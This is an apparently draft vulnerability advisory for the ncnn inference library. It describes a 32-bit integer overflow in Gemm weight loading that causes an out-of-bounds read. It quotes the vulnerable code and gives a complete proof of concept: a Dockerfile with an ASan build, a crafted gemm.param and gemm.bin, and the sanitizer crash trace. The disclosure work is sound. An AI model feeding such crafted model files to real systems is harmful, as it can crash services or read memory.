All advisories
Draft

Gemm Dimension Overflow Causes Out-of-Bounds Read

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Gemm Dimension Overflow Causes Out-of-Bounds Read

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/gemm_x86.cpp:7494 in Gemm_x86::create_pipeline
Sanitizer verdict: unknown-crash

Summary

A Gemm layer with constantM = constantK = 65537 makes ncnn's weight loader compute the element count as a 32-bit signed product that wraps to 131073, allocate that small buffer, and then reshape it back to the declared 65537x65537 dimensions. Gemm_x86::create_pipeline walks the weight matrix using the declared dimensions, running off the end of the allocation into unmapped memory and killing ncnn2int8. The attacker supplies the .param and .bin pair to the quantization tool, which loads the model at tools/quantize/ncnn2int8.cpp:1084.

Detail

Gemm::load_model passes the two attacker-controlled dimensions straight to the two-argument ModelBin::load, which multiplies them in int before allocating:

// src/layer/gemm.cpp:362
        if (transA == 0)
            A_data = mb.load(constantK, constantM, 0);
        else
            A_data = mb.load(constantM, constantK, 0);

// src/modelbin.cpp:25
Mat ModelBin::load(int w, int h, int type) const
{
    Mat m = load(w * h, type);
    if (m.empty())
        return m;

    return m.reshape(w, h);
}

65537 * 65537 is 4295098369, which wraps to 131073 in 32-bit signed arithmetic, so only 131073 floats are read and allocated. Mat::reshape is supposed to be the guard, but its consistency check overflows identically (if (w * h * d * c != _w * _h) return Mat(); at src/mat.cpp:156), so 131073 != 131073 is false and the Mat is relabelled as 65537x65537 over a 512 KB buffer.

Gemm_x86::create_pipeline then tiles over the declared M and K and dispatches the packing kernel:

// src/layer/x86/gemm_x86.cpp:7492
            if (transA)
            {
                transpose_pack_A_tile(A_data, AT_tile, i, max_ii, k, max_kk);
            }

transpose_pack_A_tile sets const size_t A_hstep = A.dims == 3 ? A.cstep : (size_t)A.w; (line 458), i.e. 65537, and strides through rows with it:

// src/layer/x86/gemm_x86.cpp:607
            const float* p0 = (const float*)A + k * A_hstep + (i + ii);

            int kk = 0;
            for (; kk < max_kk; kk++)
            {
                _mm512_store_ps(pp, _mm512_loadu_ps(p0));
                pp += 16;
                p0 += A_hstep;
            }

Each p0 += A_hstep advances 262148 bytes, so after two steps the pointer is already past the 524292-byte allocation. AddressSanitizer classifies the resulting 64-byte load as a read through a wild pointer rather than a redzone hit because the stride jumps clear over the shadow-mapped redzone. The PoC's parameter line Gemm gemm 1 1 input output 2=1 4=1 7=65537 9=65537 sets transA=1, constantA=1, constantM=65537, constantK=65537, and its .bin supplies exactly the 131073 floats the wrapped size demands, so nothing fails earlier.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-gemm-dimension-overflow-causes-out-of-bounds-read && cd ncnn-poc-gemm-dimension-overflow-causes-out-of-bounds-read

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > gemm.param <<'PARAM'
7767517
2 2
Input input 0 1 input
Gemm gemm 1 1 input output 2=1 4=1 7=65537 9=65537
PARAM

# gemm.bin: the 0x0002C056 fp32 tag followed by 131073 zero floats
printf '\126\300\002\000' > gemm.bin
head -c 524292 /dev/zero >> gemm.bin

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/quantize/ncnn2int8 gemm.param gemm.bin out.param out.bin

AddressSanitizer output:

=================================================================
==1==ERROR: AddressSanitizer: unknown-crash on address 0x7dcbad83080c at pc 0x55ab71126f6d bp 0x7ffd79b46170 sp 0x7ffd79b46160
READ of size 64 at 0x7dcbad83080c thread T0
    #0 0x55ab71126f6c in _mm512_loadu_ps(void const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342
    #1 0x55ab71126f6c in transpose_pack_A_tile /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:612
    #2 0x55ab711ebfeb in ncnn::Gemm_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7494
    #3 0x55ab6ab4a77c in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
    #4 0x55ab6ab4b3f0 in ncnn::Net::load_model(_IO_FILE*) /ncnn/src/net.cpp:2257
    #5 0x55ab6ab4b777 in ncnn::Net::load_model(char const*) /ncnn/src/net.cpp:2292
    #6 0x55ab6aa5910b in main /ncnn/tools/quantize/ncnn2int8.cpp:1084
    #7 0x7dcbadd521c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x7dcbadd5228a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x55ab6a9c2644 in _start (/ncnn/build/tools/quantize/ncnn2int8+0x2a1644) (BuildId: a2cc9b5f8fa3acdfe93a4ac496a63a5631403673)

Address 0x7dcbad83080c is a wild pointer inside of access range of size 0x000000000040.
SUMMARY: AddressSanitizer: unknown-crash /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342 in _mm512_loadu_ps(void const*)

Credit

Zheng Yu @ DepthFirst